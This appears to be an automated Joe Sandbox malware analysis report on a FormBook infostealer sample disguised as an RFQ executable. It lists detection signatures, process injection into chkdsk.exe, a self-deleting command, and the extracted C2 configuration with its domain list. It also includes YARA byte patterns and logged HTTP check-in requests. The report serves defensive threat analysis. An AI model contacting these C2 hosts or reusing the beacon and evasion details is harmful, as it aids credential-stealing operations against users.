Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ-BCM 03122020.exe

Overview

General Information

Sample Name:RFQ-BCM 03122020.exe
Analysis ID:435309
MD5:d3d5e6cafa8ca89384e56e6374a14203
SHA1:ba57aa266efd34ec5fe657c13ecda85e97ad5b5c
SHA256:214910524a528bab8dae4a704169e20d9f2f92444df6e6a65d19decafd9f69b0
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RFQ-BCM 03122020.exe (PID: 4628 cmdline: 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe' MD5: D3D5E6CAFA8CA89384E56E6374A14203)
    • RFQ-BCM 03122020.exe (PID: 5988 cmdline: 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe' MD5: D3D5E6CAFA8CA89384E56E6374A14203)
  • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
    • chkdsk.exe (PID: 3536 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
      • cmd.exe (PID: 4968 cmdline: /c del 'C:\Users\user\Desktop\RFQ-BCM 03122020.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 4972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.jiltedowl.com/um8e/"], "decoy": ["theypretend.com", "hopeschildren.com", "kuly.cloud", "maniflexx.net", "bedtimesocietyblog.com", "spenglerwetlandpreserve.com", "unity-play.net", "bonap56.com", "consciencevc.com", "deluxeluxe.com", "officialjuliep.com", "cttrade.club", "quietflyt.com", "mcabspl.com", "lippocaritahotel.com", "tolanfilms.xyz", "momenaagro.com", "slingshotart.com", "thefoundershuddle.com", "mobilbaris.com", "castlerockbotanicals.com", "dautusim.com", "tolteca.club", "saddletaxweigh.info", "oxydiumcorp.com", "themiamadison.com", "888luckys.net", "brandsuggestion.com", "jusdra.com", "therios.net", "helpushelpothersstore.com", "pornometal.com", "whejvrehj.com", "ngzhaohern.com", "slaskie.pro", "heuristicadg.com", "angrybird23blog.com", "my-bmi.space", "lufral.com", "influenced-brands.com", "vicdux.life", "top1opp.com", "techiedrill.com", "sitedesing.com", "bigtittylesbians.com", "xspinworks14.com", "alturadesingfit.com", "venturivasiljevic.com", "yxsj.info", "yorkshirebridalmakeup.info", "shopinnocenceeyejai.com", "yinhangli.com", "tickimumm.com", "xn--939am40byoeizq.com", "customerservuce.com", "blendoriginal.com", "freelancebizquiz.com", "matjar-lik.com", "bellaxxocosmetics.com", "gxdazj.com", "findbriefmarken.com", "pubgevents1.com", "metis.network", "eternapure.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        2.2.RFQ-BCM 03122020.exe.2160000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.RFQ-BCM 03122020.exe.2160000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.jiltedowl.com/um8e/"], "decoy": ["theypretend.com", "hopeschildren.com", "kuly.cloud", "maniflexx.net", "bedtimesocietyblog.com", "spenglerwetlandpreserve.com", "unity-play.net", "bonap56.com", "consciencevc.com", "deluxeluxe.com", "officialjuliep.com", "cttrade.club", "quietflyt.com", "mcabspl.com", "lippocaritahotel.com", "tolanfilms.xyz", "momenaagro.com", "slingshotart.com", "thefoundershuddle.com", "mobilbaris.com", "castlerockbotanicals.com", "dautusim.com", "tolteca.club", "saddletaxweigh.info", "oxydiumcorp.com", "themiamadison.com", "888luckys.net", "brandsuggestion.com", "jusdra.com", "therios.net", "helpushelpothersstore.com", "pornometal.com", "whejvrehj.com", "ngzhaohern.com", "slaskie.pro", "heuristicadg.com", "angrybird23blog.com", "my-bmi.space", "lufral.com", "influenced-brands.com", "vicdux.life", "top1opp.com", "techiedrill.com", "sitedesing.com", "bigtittylesbians.com", "xspinworks14.com", "alturadesingfit.com", "venturivasiljevic.com", "yxsj.info", "yorkshirebridalmakeup.info", "shopinnocenceeyejai.com", "yinhangli.com", "tickimumm.com", "xn--939am40byoeizq.com", "customerservuce.com", "blendoriginal.com", "freelancebizquiz.com", "matjar-lik.com", "bellaxxocosmetics.com", "gxdazj.com", "findbriefmarken.com", "pubgevents1.com", "metis.network", "eternapure.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: RFQ-BCM 03122020.exeVirustotal: Detection: 20%Perma Link
          Source: RFQ-BCM 03122020.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: RFQ-BCM 03122020.exeJoe Sandbox ML: detected
          Source: 13.2.chkdsk.exe.4675830.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 13.2.chkdsk.exe.5097960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: RFQ-BCM 03122020.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: chkdsk.pdbGCTL source: RFQ-BCM 03122020.exe, 00000003.00000002.305148472.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: chkdsk.pdb source: RFQ-BCM 03122020.exe, 00000003.00000002.305148472.0000000000A40000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RFQ-BCM 03122020.exe, 00000002.00000003.250609113.00000000098A0000.00000004.00000001.sdmp, RFQ-BCM 03122020.exe, 00000003.00000002.305161536.0000000000B50000.00000040.00000001.sdmp, chkdsk.exe, 0000000D.00000002.518417672.0000000004B60000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RFQ-BCM 03122020.exe, chkdsk.exe
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00405CD8 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_0040263E FindFirstFileA,
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 104.252.53.222:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 104.252.53.222:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49740 -> 104.252.53.222:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.jiltedowl.com/um8e/
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg HTTP/1.1Host: www.jiltedowl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg HTTP/1.1Host: www.slingshotart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg HTTP/1.1Host: www.venturivasiljevic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=Xi9PH5iXPg7OqoK0h1gN6IvgnIc5gotQ/5tv039xv1j+fqecGtXMWbrdMdu22zA2SdJt&z6AhC6=4h0836-hg HTTP/1.1Host: www.helpushelpothersstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg HTTP/1.1Host: www.vicdux.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg HTTP/1.1Host: www.lippocaritahotel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg HTTP/1.1Host: www.sitedesing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg HTTP/1.1Host: www.themiamadison.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg HTTP/1.1Host: www.influenced-brands.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 100.24.208.97 100.24.208.97
          Source: Joe Sandbox ViewIP Address: 192.0.78.24 192.0.78.24
          Source: Joe Sandbox ViewASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=KKIQ4+/JXGLy+NPKOmU9hT636Guj5rKZNfTWQVYkTfV7RhYYbHnV1SAJBWZXUUxQase4&z6AhC6=4h0836-hg HTTP/1.1Host: www.jiltedowl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=+OafPWEw6Z0Z/R6BCooy8AJa5dJFYQpN1/QWnuYdhiYhG0yayK8Tfl0bClCAF0vxrCxk&z6AhC6=4h0836-hg HTTP/1.1Host: www.slingshotart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=Yr1O9d2lyD9rL0BsR5AOXBjd9Tt7L5u6HmDWn6NeMbq+6FaKs7VlSuQ+xmgdPYl8Ubqc&z6AhC6=4h0836-hg HTTP/1.1Host: www.venturivasiljevic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=Xi9PH5iXPg7OqoK0h1gN6IvgnIc5gotQ/5tv039xv1j+fqecGtXMWbrdMdu22zA2SdJt&z6AhC6=4h0836-hg HTTP/1.1Host: www.helpushelpothersstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=xbMoviQlEnjsHrEbTPTiLAbjABxJdIVdbR0FO8anDWX5sWiRIQHIKvYrn6XTqKSl/tf+&z6AhC6=4h0836-hg HTTP/1.1Host: www.vicdux.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=jQU7CxI2ATQsp+gAQw0922hAeD0Z0/nKIEFQeuBuNEOev1XtQ7gaXUtk4Kl0GHqLnKhz&z6AhC6=4h0836-hg HTTP/1.1Host: www.lippocaritahotel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=5AA2OBt9f+luPmvaEKU5k+Cesx0roAkoENQvosg49Q0qMzSHjZ+2qPqQ9q6NL9KFhBoB&z6AhC6=4h0836-hg HTTP/1.1Host: www.sitedesing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=NkJAbAW12eli3K5LHnKsR+Euvd9TZZ9XHnn7bgS23Br3geXrqL1EBTSK/IXVH0nBwn3R&z6AhC6=4h0836-hg HTTP/1.1Host: www.themiamadison.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /um8e/?4h=OS+4PEF1Ll0k0ag4LLFRlEV4qtlkwOP7xXHx1u8kCQ7qmPGCq8FzaBf5dHjLd1oRWXdL&z6AhC6=4h0836-hg HTTP/1.1Host: www.influenced-brands.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.jiltedowl.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.0Date: Wed, 16 Jun 2021 09:56:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: close
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: RFQ-BCM 03122020.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: RFQ-BCM 03122020.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpString found in binary or memory: http://sitedesing.com/404.html/index.xml
          Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpString found in binary or memory: http://sitedesing.com/404/
          Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpString found in binary or memory: http://sitedesing.com/images/Asset
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000004.00000000.278057340.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/lunr.js/0.7.2/lunr.min.js
          Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css
          Source: chkdsk.exe, 0000000D.00000002.521332311.0000000005212000.00000004.00000001.sdmpString found in binary or memory: https://opensource.keycdn.com/fontawesome/4.7.0/font-awesome.min.css
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 2_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000D.00000002.517395311.0000000004320000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304999072.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000001.254539209.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.304861461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.517835626.00000000047A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.257817339.0000000002160000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.516326886.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.305023643.00000000006D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ-BCM 03122020.exe.2160000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.1.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RFQ-BCM 03122020.exe.400000.0.unpack, type: UNPACKEDPE
